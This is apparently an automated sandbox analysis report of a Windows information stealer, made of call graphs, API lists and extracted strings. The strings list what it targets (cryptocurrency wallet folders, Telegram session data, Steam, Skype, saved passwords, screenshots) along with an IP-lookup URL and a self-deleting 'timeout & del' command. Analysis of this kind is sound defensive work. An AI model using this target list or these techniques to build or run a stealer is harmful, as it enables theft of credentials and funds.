40fff0 19802->19803 19804 404810 9 API calls 19803->19804 19805 40fffe 19804->19805 19806 403bdc SysFreeString 19805->19806 19807 410006 19806->19807 19807->19690 19808->19795 19809->19795 19815 40e6ed 19811->19815 19812 40e734 19813 403508 7 API calls 19812->19813 19814 40e78e 19813->19814 19814->19700 19815->19812 19829 40e694 19815->19829 19821 4051a6 19819->19821 19820 405239 19822 4034e4 7 API calls 19820->19822 19821->19820 19824 404804 12 API calls 19821->19824 19823 40524e 19822->19823 19823->19795 19825 405212 19824->19825 19826 403538 7 API calls 19825->19826 19827 405231 19826->19827 19828 405114 7 API calls 19827->19828 19828->19820 19830 4034e4 7 API calls 19829->19830 19832 40e6a2 19830->19832 19831 40e6ce 19836 40e398 19831->19836 19832->19831 19833 403b1c 7 API calls 19832->19833 19834 40e6b8 19833->19834 19835 40e6c8 CharToOemBuffA 19834->19835 19835->19831 19837 40e3bc 19836->19837 19838 40357c 7 API calls 19837->19838 19839 40e3dd 19838->19839 19840 40357c 7 API calls 19839->19840 19841 40e3e8 19840->19841 19842 403b1c 7 API calls 19841->19842 19843 40e407 19842->19843 19844 403b1c 7 API calls 19843->19844 19845 40e411 19844->19845 19846 4039e8 7 API calls 19845->19846 19847 40e419 19846->19847 19848 4035d4 7 API calls 19847->19848 19849 40e4d9 19848->19849 19850 403850 7 API calls 19849->19850 19851 40e4f2 19850->19851 19852 4034e4 7 API calls 19851->19852 19853 40e4fa 19852->19853 19854 4035d4 7 API calls 19853->19854 19855 40e50a 19854->19855 19856 403850 7 API calls 19855->19856 19857 40e520 19856->19857 19858 4034e4 7 API calls 19857->19858 19859 40e528 19858->19859 19860 403508 7 API calls 19859->19860 19861 40e545 19860->19861 19861->19812 20016 411615 20015->20016 20016->20016 20017 404150 SysAllocStringLen 20016->20017 20229 413300 20228->20229 20230 413b47 20229->20230 20231 4062fc 3 API calls 20229->20231 20232 403bf4 SysFreeString 20230->20232 20233 413341 20231->20233 20234 413b64 20232->20234 20382 412d6c 20233->20382 20235 4034e4 7 API calls 20234->20235 20236 413b6c 20235->20236 20236->17121 20239 4062fc 3 API calls 20240 413372 20239->20240 20241 412d6c 29 API calls 20240->20241 20242 413392 20241->20242 20243 4062fc 3 API calls 20242->20243 20244 4133a3 20243->20244 20245 412d6c 29 API calls 20244->20245 20246 4133c3 20245->20246 20247 4062fc 3 API calls 20246->20247 20248 4133d4 20247->20248 20249 412d6c 29 API calls 20248->20249 20250 4133f4 20249->20250 20251 4062fc 3 API calls 20250->20251 20252 413405 20251->20252 20253 412d6c 29 API calls 20252->20253 20254 413425 20253->20254 20255 4062fc 3 API calls 20254->20255 20256 413436 20255->20256 20257 412d6c 29 API calls 20256->20257 20258 413456 20257->20258 20259 4062fc 3 API calls 20258->20259 20260 413467 20259->20260 20261 412d6c 29 API calls 20260->20261 20262 413487 20261->20262 20263 4062fc 3 API calls 20262->20263 20264 413498 20263->20264 20265 412d6c 29 API calls 20264->20265 20266 4134b8 20265->20266 20267 4062fc 3 API calls 20266->20267 20268 4134c9 20267->20268 20269 412d6c 29 API calls 20268->20269 20270 4134e9 20269->20270 20271 4062fc 3 API calls 20270->20271 20272 4134fa 20271->20272 20273 412d6c 29 API calls 20272->20273 20274 41351a 20273->20274 20275 4062fc 3 API calls 20274->20275 20276 41352b 20275->20276 20277 412d6c 29 API calls 20276->20277 20278 41354b 20277->20278 20279 4062fc 3 API calls 20278->20279 20280 41355c 20279->20280 20281 412d6c 29 API calls 20280->20281 20383 404150 SysAllocStringLen 20382->20383 20384 412dc7 20383->20384 20385 404150 SysAllocStringLen 20384->20385 20386 412dcf 20385->20386 20387 404150 SysAllocStringLen 20386->20387 20388 412dd7 20387->20388 20389 403e14 3 API calls 20388->20389 20390 412dff 20389->20390 20391 412e0a FindFirstFileW 20390->20391 20406 412e13 20391->20406 20392 40776c 2 API calls 20392->20406 20393 412f52 FindNextFileW 20394 412f6a FindClose 20393->20394 20393->20406 20395 412f80 20394->20395 20396 403bf4 SysFreeString 20395->20396 20397 412f90 20396->20397 20398 4034e4 7 API calls 20397->20398 20400 412f9b 20398->20400 20401 403bf4 SysFreeString 20400->20401 20402 412fab 20401->20402 20403 4034e4 7 API calls 20402->20403 20405 412fb6 20403->20405 20404 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20404->20406 20407 403bf4 SysFreeString 20405->20407 20406->20392 20406->20393 20406->20404 20408 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 20406->20408 20412 40e6d4 8 API calls 20406->20412 20444 412974 20406->20444 20409 412fc6 20407->20409 20408->20406 20410 403bf4 SysFreeString 20409->20410 20411 412fd3 20410->20411 20411->20239 20412->20406 20445 41297c 20444->20445 20445->20445 20446 404150 SysAllocStringLen 20445->20446 20447 412994 20446->20447 20448 403bdc SysFreeString 20447->20448 20449 4129aa GetTickCount 20448->20449 20450 40709c 4 API calls 20449->20450 20451 4129c5 20450->20451 20452 406fdc 10 API calls 20451->20452 20453 4129d0 20452->20453 20454 403e78 3 API calls 20453->20454 20455 4129e5 20454->20455 20456 4078d8 8 API calls 20455->20456 20457 4129f0 20456->20457 20458 4062fc 3 API calls 20457->20458 20459 4129fd 20458->20459 20460 403e78 3 API calls 20459->20460 20461 412a15 20460->20461 20462 4078d8 8 API calls 20461->20462 20463 412a20 20462->20463 20464 412a33 CopyFileW 20463->20464 20465 412a44 20464->20465 20466 404b58 8 API calls 20465->20466 20467 412a4f 20466->20467 20468 40776c 2 API calls 20467->20468 20491 412a62 20468->20491 20469 412a66 20470 403bf4 SysFreeString 20469->20470 20471 412bf4 20470->20471 20472 4034e4 7 API calls 20471->20472 20473 412bfc 20472->20473 20474 403bf4 SysFreeString 20473->20474 20475 412c09 20474->20475 20476 403508 7 API calls 20475->20476 20477 412c16 20476->20477 20479 403bf4 SysFreeString 20477->20479 20478 412b91 20480 403c18 3 API calls 20478->20480 20481 412c23 20479->20481 20482 412bcc 20480->20482 20484 4034e4 7 API calls 20481->20484 20486 412bd4 DeleteFileW 20482->20486 20483 4034e4 7 API calls 20483->20491 20485 412c2b 20484->20485 20487 403bf4 SysFreeString 20485->20487 20486->20469 20488 412c38 20487->20488 20489 403bdc SysFreeString 20488->20489 20490 412c40 20489->20490 20490->20406 20491->20469 20491->20478 20491->20483 20492 403e78 3 API calls 20491->20492 20492->20491 20543 404150 SysAllocStringLen 20542->20543 20544 4077db 20543->20544 20545 403bdc SysFreeString 20544->20545 20547 4077f0 20545->20547 20546 403bdc SysFreeString 20548 407845 20546->20548 20549 403f44 4 API calls 20547->20549 20550 407829 20547->20550 20548->17723 20549->20550 20550->20546 20552 404150 SysAllocStringLen 20551->20552 20553 40e7b5 20552->20553 20554 40e86b 20553->20554 20555 407228 9 API calls 20553->20555 20556 403bf4 SysFreeString 20554->20556 20560 40e7f7 20555->20560 20557 40e885 20556->20557 20558 403508 7 API calls 20557->20558 20559 40e892 20558->20559 20562 403bdc SysFreeString 20559->20562 20561 40e845 20560->20561 20564 4062fc 3 API calls 20560->20564 20563 40e6d4 8 API calls 20561->20563 20565 40e89a 20562->20565 20566 40e850 20563->20566 20569 40e812 20564->20569 20565->17736 20567 4062fc 3 API calls 20566->20567 20568 40e85d 20567->20568 20570 40e865 DeleteFileW 20568->20570 20571 40e823 CopyFileW 20569->20571 20570->20554 20571->20561 20572 40e82d 20571->20572 20573 4062fc 3 API calls 20572->20573 20574 40e83a 20573->20574 20575 407228 9 API calls 20574->20575 20575->20561 20577 40509c 20576->20577 20578 403538 7 API calls 20577->20578 20583 4050b4 20578->20583 20579 4050f1 20580 4034e4 7 API calls 20579->20580 20582 405106 20580->20582 20581 4039e8 7 API calls 20581->20583 20582->17784 20583->20579 20583->20581 20585 404150 SysAllocStringLen 20584->20585 20586 407194 20585->20586 20587 404150 SysAllocStringLen 20586->20587 20588 40719c 20587->20588 20589 404150 SysAllocStringLen 20588->20589 20596 4071a4 20589->20596 20590 4071f1 20591 403c18 3 API calls 20590->20591 20592 4071fc 20591->20592 20593 403bf4 SysFreeString 20592->20593 20594 407216 20593->20594 20594->17815 20595 403f90 3 API calls 20595->20596 20596->20590 20596->20595 20598 404020 20596->20598 20600 404038 20598->20600 20599 4040b3 20599->20596 20600->20599 20601 403bb4 2 API calls 20600->20601 20602 404063 20601->20602 20603 403bcc SysFreeString 20602->20603 20603->20599 20605 416f16 20604->20605 20606 404804 12 API calls 20605->20606 20609 416f33 20605->20609 20606->20609 20607 404810 9 API calls 20608 416f9e GlobalFix 20607->20608 20608->17848 20609->20607 20610->17866 20611->17869 20613 4166ab 20612->20613 20613->17905 20615 403538 7 API calls 20614->20615 20616 407b31 20615->20616 20617 407b40 20616->20617 20618 407b4f 20616->20618 20619 40357c 7 API calls 20617->20619 20620 40357c 7 API calls 20618->20620 20621 407b4d 20619->20621 20620->20621 20815 407af0 GetPEB 20621->20815 20623 407b61 20624 40709c 4 API calls 20623->20624 20625 407b89 20624->20625 20626 40709c 4 API calls 20625->20626 20627 407b9b 20626->20627 20628 403e78 3 API calls 20627->20628 20630 407bab 20628->20630 20629 407bc7 20632 403bf4 SysFreeString 20629->20632 20630->20629 20631 403798 7 API calls 20630->20631 20631->20629 20633 407be1 20632->20633 20634 4034e4 7 API calls 20633->20634 20635 407be9 20634->20635 20635->17910 20637 403c18 3 API calls 20636->20637 20638 4066f3 20637->20638 20816 406678 GetModuleHandleA GetProcAddress 20638->20816 20641 406708 20641->17914 20642 403c18 3 API calls 20642->20641 20649 4166ed 20643->20649 20644 416759 20645 403508 7 API calls 20644->20645 20646 416776 20645->20646 20646->17937 20648 403850 7 API calls 20648->20649 20649->20644 20649->20648 20819 40633c 20649->20819 20651 41689c 20650->20651 20651->20651 20652 40709c 4 API calls 20651->20652 20653 4168ce 20652->20653 20654 40709c 4 API calls 20653->20654 20655 4168e2 20654->20655 20815->20623 20817 4066a3 20816->20817 20818 40669a GetCurrentProcess 20816->20818 20817->20641 20817->20642 20818->20817 20820 406350 20819->20820 20821 403538 7 API calls 20820->20821 20826 406368 20821->20826 20822 4063a5 20823 4034e4 7 API calls 20822->20823 20824 4063ba 20823->20824 20824->20649 20825 4039e8 7 API calls 20825->20826 20826->20822 20826->20825 20850 404278 20849->20850 20852 404271 20849->20852 20851 402614 7 API calls 20850->20851 20853 40427f 20851->20853 20852->18017 20853->18017 20855 404246 20854->20855 20856 404280 9 API calls 20855->20856 20857 40425f 20855->20857 20856->20855 20857->18016 20859 403372 GetStdHandle WriteFile GetStdHandle WriteFile 20858->20859 20860 4033c9 20858->20860 20859->17250 20861 4033d2 MessageBoxA 20860->20861 20862 4033e5 20860->20862 20861->20862 20862->17250 20864 40a6aa 20865 40a6b5 LoadLibraryA GetProcAddress 20864->20865 20866 40a6cf 20864->20866 20865->20866 20867 401f5c 20868 401f70 20867->20868 20869 401f79 20867->20869 20885 401870 RtlInitializeCriticalSection 20868->20885 20871 401fa2 RtlEnterCriticalSection 20869->20871 20873 401fac 20869->20873 20876 401f81 20869->20876 20871->20873 20873->20876 20879 401e68 20873->20879 20877 4020d7 20878 4020cd RtlLeaveCriticalSection 20878->20877 20882 401e78 20879->20882 20880 401ea4 20884 401ec8 20880->20884 20897 401c7c 20880->20897 20882->20880 20882->20884 20892 401ddc 20882->20892 20884->20877 20884->20878 20886 401894 RtlEnterCriticalSection 20885->20886 20887 40189e 20885->20887 20886->20887 20888 4018bc LocalAlloc 20887->20888 20889 4018d6 20888->20889 20890 401925 20889->20890 20891 40191b RtlLeaveCriticalSection 20889->20891 20890->20869 20890->20876 20891->20890 20901 401630 20892->20901 20895 401df9 20895->20882 20898 401cd1 20897->20898 20899 401c9a 20897->20899 20898->20899 20970 401bcc 20898->20970 20899->20884 20905 40164c 20901->20905 20903 401656 20926 40151c 20903->20926 20905->20903 20906 4016b3 20905->20906 20909 4016a7 20905->20909 20918 401388 20905->20918 20930 401284 20905->20930 20906->20895 20911 401d50 20906->20911 20908 401662 20908->20906 20934 401464 20909->20934 20944 401d04 20911->20944 20914 401284 LocalAlloc 20916 401d74 20914->20916 20915 401d7c 20915->20895 20916->20915 20948 401aa8 20916->20948 20919 401397 VirtualAlloc 20918->20919 20921 4013c4 20919->20921 20922 4013e7 20919->20922 20938 40123c 20921->20938 20922->20905 20925 4013d4 VirtualFree 20925->20922 20927 401562 20926->20927 20928 40157e VirtualAlloc 20927->20928 20929 401592 20927->20929 20928->20927 20928->20929 20929->20908 20931 4012a0 20930->20931 20932 40123c LocalAlloc 20931->20932 20933 4012e6 20932->20933 20933->20905 20937 401493 20934->20937 20935 4014ec 20935->20906 20936 4014c0 VirtualFree 20936->20937 20937->20935 20937->20936 20941 4011e4 20938->20941 20942 4011f0 LocalAlloc 20941->20942 20943 401202 20941->20943 20942->20943 20943->20922 20943->20925 20945 401d0d 20944->20945 20947 401d16 20944->20947 20945->20947 20953 401ad8 20945->20953 20947->20914 20949 401ac5 20948->20949 20950 401ab6 20948->20950 20949->20915 20951 401c7c 9 API calls 20950->20951 20952 401ac3 20951->20952 20952->20915 20956 4020ec 20953->20956 20955 401af9 20955->20947 20957 40210a 20956->20957 20958 402105 20956->20958 20960 402145 20957->20960 20961 40213b RtlEnterCriticalSection 20957->20961 20962 40210e 20957->20962 20959 401870 4 API calls 20958->20959 20959->20957 20963 4021d4 20960->20963 20967 402151 20960->20967 20968 402200 20960->20968 20961->20960 20962->20955 20963->20962 20966 401d04 7 API calls 20963->20966 20964 402273 RtlLeaveCriticalSection 20965 40227d 20964->20965 20965->20955 20966->20962 20967->20964 20967->20965 20968->20967 20969 401c7c 7 API calls 20968->20969 20969->20967 20972 401be2 20970->20972 20971 401c6a 20971->20899 20972->20971 20973 401c21 20972->20973 20974 401c0d 20972->20974 20976 4017e4 3 API calls 20973->20976 20983 4017e4 20974->20983 20977 401c1f 20976->20977 20977->20971 20978 401aa8 9 API calls 20977->20978 20979 401c45 20978->20979 20980 401c5f 20979->20980 20993 401afc 20979->20993 20998 4012f4 20980->20998 20984 40180a 20983->20984 20985 401863 20983->20985 21002 4015b0 20984->21002 20985->20977 20988 401284 LocalAlloc 20989 401827 20988->20989 20990 40183e 20989->20990 20991 401464 VirtualFree 20989->20991 20990->20985 20992 4012f4 LocalAlloc 20990->20992 20991->20990 20992->20985 20994 401b01 20993->20994 20996 401b0f 20993->20996 20995 401ad8 9 API calls 20994->20995 20997 401b0e 20995->20997 20996->20980 20997->20980 20999 4012ff 20998->20999 21000 40123c LocalAlloc 20999->21000 21001 40131a 20999->21001 21000->21001 21001->20971 21004 4015e7 21002->21004 21003 401627 21003->20988 21004->21003 21005 401601 VirtualFree 21004->21005 21005->21004 21006 40370c 21007 403640 21006->21007 21008 403659 21007->21008 21011 403662 21007->21011 21009 4034e4 7 API calls 21008->21009 21013 403660 21009->21013 21010 403695 21012 403b1c 7 API calls 21010->21012 21011->21010 21022 403604 WideCharToMultiByte 21011->21022 21015 4036a2 21012->21015 21023 403604 WideCharToMultiByte 21015->21023 21016 403680 21016->21010 21018 403686 21016->21018 21019 4035d4 7 API calls 21018->21019 21019->21013 21020 4036b0 21021 403b1c 7 API calls 21020->21021 21021->21013 21022->21016 21023->21020

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1 4186c4-4186c7 2 4186cc-4186d1 1->2 2->2 3 4186d3-418764 call 403980 call 4034e4 call 40357c call 405668 call 407de0 call 406ce8 call 403798 call 403990 CreateMutexA 2->3 21 41876a-4187f0 call 40357c call 416dd4 call 4069a8 call 40357c call 406ce8 call 406834 call 4037dc call 416dd4 call 417d84 3->21 22 41965c-41985d call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bdc call 403508 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 4034e4 call 403bf4 call 403508 call 4034e4 call 404280 call 403508 call 4034e4 call 403508 * 2 3->22 58 4187f5-418812 call 416dd4 call 403790 21->58 58->22 67 418818-418825 call 4038dc 58->67 67->22 73 41882b-4188da call 4074e8 call 4069a8 call 4074e8 call 406b08 call 407a18 call 4074e8 call 4069a8 call 408180 call 409668 call 40e630 call 404648 67->73 120 4188e0-4188e1 73->120 121 418fb5-419343 call 41698c call 403850 call 40e6d4 call 406ce8 call 406834 call 407b08 call 406834 call 406bd8 call 40377c call 406834 call 4066e4 call 40377c call 406834 call 406634 call 40377c call 406834 call 4065f0 call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 call 40709c call 40377c call 406834 * 2 call 407de0 call 406834 call 403850 call 4063c8 call 406560 call 40e8d0 call 403850 73->121 124 4188e3-4188f1 call 403790 120->124 406 419345-419382 call 403850 121->406 407 419387-4193cd call 416dd4 call 417d84 call 405114 call 403790 121->407 131 4188f7-4188f9 124->131 132 418fad-418faf 124->132 135 4188ff-418909 131->135 136 418b3e-418b47 131->136 132->121 132->124 139 41892b-418935 135->139 140 41890b-418926 call 40e1dc call 405424 call 40e6d4 135->140 142 418ed1-418eda 136->142 143 418b4d-418b7c call 407a18 call 40357c call 403ad4 136->143 146 418937-418955 call 413bb4 call 405574 call 40e6d4 139->146 147 41895a-418964 139->147 140->139 151 418ef7-418f00 142->151 152 418edc-418ef2 call 403850 142->152 199 418b82-418baf call 4074e8 143->199 200 418dee-418ecc call 403d88 * 2 call 407108 call 4038dc * 2 call 403850 call 403d88 * 2 call 4037dc call 403d88 call 413f58 143->200 146->147 153 418966 call 413be8 147->153 154 41896b-418975 147->154 151->132 156 418f06-418f29 call 407a18 call 4038dc 151->156 152->151 153->154 163 418a98-418aa2 154->163 164 41897b-418a23 call 414de8 call 413f58 * 4 154->164 206 418f2b-418f9b call 417d84 call 4074e8 * 2 call 403850 call 40e6d4 156->206 207 418f9d-418fa8 call 40e6d4 156->207 174 418aa4-418aa9 call 414808 163->174 175 418aae-418ab8 163->175 253 418a25-418a2a 164->253 254 418a2c-418a4f call 413f58 164->254 174->175 188 418adb-418ae5 175->188 189 418aba-418ad6 call 413f58 175->189 192 418af1-418afb 188->192 193 418ae7-418aec call 414a90 188->193 189->188 203 418afd-418b29 GetSystemMetrics * 2 call 416fb0 call 40e6d4 192->203 204 418b2e-418b38 192->204 193->192 199->22 238 418bb5-418bbb 199->238 200->142 203->204 204->136 217 418b3a 204->217 206->132 207->132 217->136 244 418de0-418de3 238->244 250 418bc0-418bf6 call 40709c call 40377c call 403ad4 244->250 251 418de9 244->251 298 418ddd 250->298 299 418bfc-418dd8 call 403cf4 call 403850 call 403d88 * 2 call 40717c call 40377c call 4034e4 call 403850 call 403d88 call 40717c call 403db4 call 40377c call 403d88 call 4078d8 call 40377c call 403d88 * 2 call 407108 call 4038dc * 2 call 4037dc call 403d88 * 2 call 4037dc call 403d88 call 413f58 250->299 251->142 253->254 269 418a51-418a56 254->269 270 418a58-418a7b call 413f58 254->270 269->270 286 418a84-418a8c 270->286 287 418a7d-418a82 270->287 286->163 292 418a8e-418a93 call 405114 286->292 287->286 292->163 298->244 299->298 406->407 419 4193d3-4193f0 call 407a18 call 404648 407->419 420 4194dd-4194fd call 4099c0 call 407de0 call 4038dc 407->420 419->420 429 4193f6-4193f7 419->429 434 419518-419525 call 4038dc 420->434 435 4194ff-41950c call 4038dc 420->435 431 4193f9-41942f call 404804 call 407a18 call 404648 429->431 452 4194d5-4194d7 431->452 453 419435-419444 call 4038dc 431->453 434->22 442 41952b-41952f 434->442 435->434 444 41950e-419513 call 407e90 435->444 442->22 445 419535-419657 call 4028e0 call 4062fc call 403d98 call 4062fc call 402754 call 403d88 call 4077c8 call 403e78 call 403d98 call 402754 call 403d88 call 407854 call 403d98 ExitProcess 442->445 444->22 452->420 452->431 453->452 458 41944a-41946e call 407a18 call 404648 453->458 468 4194b1-4194b5 458->468 469 419470-419471 458->469 468->452 472 4194b7-4194d0 call 4038dc call 41841c 468->472 471 419478-4194a9 call 40633c call 403ad4 469->471 471->468 486 4194ab-4194af 471->486 472->452 486->468 486->471
                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00418751
                    • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                    • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                    • Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                    • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                    • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                  • GetSystemMetrics.USER32(00000001), ref: 00418B0C
                  • GetSystemMetrics.USER32(00000000), ref: 00418B14
                  • ExitProcess.KERNEL32(00000000), ref: 00419657
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
                  • String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
                  • API String ID: 2865495769-3281574059
                  • Opcode ID: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
                  • Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
                  • Opcode Fuzzy Hash: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
                  • Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
                  • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
                  • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
                  • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
                  • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
                  • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
                  • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
                  • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                  • API String ID: 2574300362-2815069134
                  • Opcode ID: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
                  • Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
                  • Opcode Fuzzy Hash: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
                  • Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D
                  APIs
                  • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                  • Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
                  • Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                  • Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
                  • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
                  • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
                  • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
                  • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
                  • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
                  • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
                  • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
                  • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
                  • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
                  • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
